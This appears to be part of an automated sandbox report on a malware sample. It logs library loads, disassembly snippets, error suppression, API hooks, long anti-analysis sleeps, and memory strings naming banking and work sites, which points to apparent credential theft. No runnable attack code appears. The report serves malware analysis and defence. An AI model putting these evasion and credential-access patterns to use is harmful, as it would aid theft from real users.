Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04FB29FA push eax; ret	2_2_04FB2A29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041F04F push ebx; ret	10_2_0041F058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00403280 push eax; ret	10_2_00403282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041AB61 pushfd ; ret	10_2_0041AB78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041ABD6 push ds; ret	10_2_0041ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040D38A push edx; iretd	10_2_0040D453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00426CC3 pushad ; iretd	10_2_00426CEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004084DA push esi; retf	10_2_004084DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004084FF push ebp; iretd	10_2_00408502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00412559 push ecx; iretd	10_2_0041255A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004125DC pushfd ; iretd	10_2_004125FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00413E59 push 2C1D344Fh; ret	10_2_00413E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00405E25 push ecx; ret	10_2_00405E2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401F0E push ss; retf	10_2_00401F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027C225F pushad ; ret	10_2_027C27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027C27FA pushad ; ret	10_2_027C27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027C283D push eax; iretd	10_2_027C2858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027F09AD push ecx; mov dword ptr [esp], ecx	10_2_027F09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_027C1200 push eax; iretd	10_2_027C1369
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04274DBC pushfd ; ret	12_2_04274DD3
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_042675E5 push edx; iretd	12_2_042676AE
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04274E31 push ds; ret	12_2_04274E33
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04262735 push esi; retf	12_2_04262738
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04280F1E pushad ; iretd	12_2_04280F46
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04270742 push eax; ret	12_2_0427074E
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426275A push ebp; iretd	12_2_0426275D
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426C7B4 push ecx; iretd	12_2_0426C7B5
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426C837 pushfd ; iretd	12_2_0426C856
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_0426E0B4 push 2C1D344Fh; ret	12_2_0426E0BB
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe	Code function: 12_2_04260080 push ecx; ret	12_2_04260086
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 13_2_04B627FA pushad ; ret	13_2_04B627F9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418CD324
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418CD7E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418CD944
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418CD504
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418CD544
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418CD1E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418D0154
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FF8418CDA44

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 26C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2450000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3137			Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Window / User API: threadDelayed 9784			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\runonce.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5904	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 1056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 7284	Thread sleep count: 188 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 7284	Thread sleep time: -376000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 7284	Thread sleep count: 9784 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 7284	Thread sleep time: -19568000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\WhiMwXmGItPQRKbWlsStqecYVYIXRECtRvyiPPSYeyauMmGwYEHcDxGvjeeMsZMqiDql\UmhFZco3dB3hLZpEx5uvm.exe TID: 7472	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\runonce.exe	Last function: Thread delayed

Source: 6511-iOQ--.13.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 6511-iOQ--.13.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 6511-iOQ--.13.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: powershell.exe, 00000002.00000002.1302140636.0000000006079000.00000004.00000800.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1761114470.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1763572689.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1819180645.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1756307655.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1qEmuSW3rOVU9h0g7a9n.exex
Source: 6511-iOQ--.13.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: 6511-iOQ--.13.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 6511-iOQ--.13.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: runonce.exe, 0000000D.00000002.2542392067.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,1169650#
Source: 6511-iOQ--.13.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: 6511-iOQ--.13.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
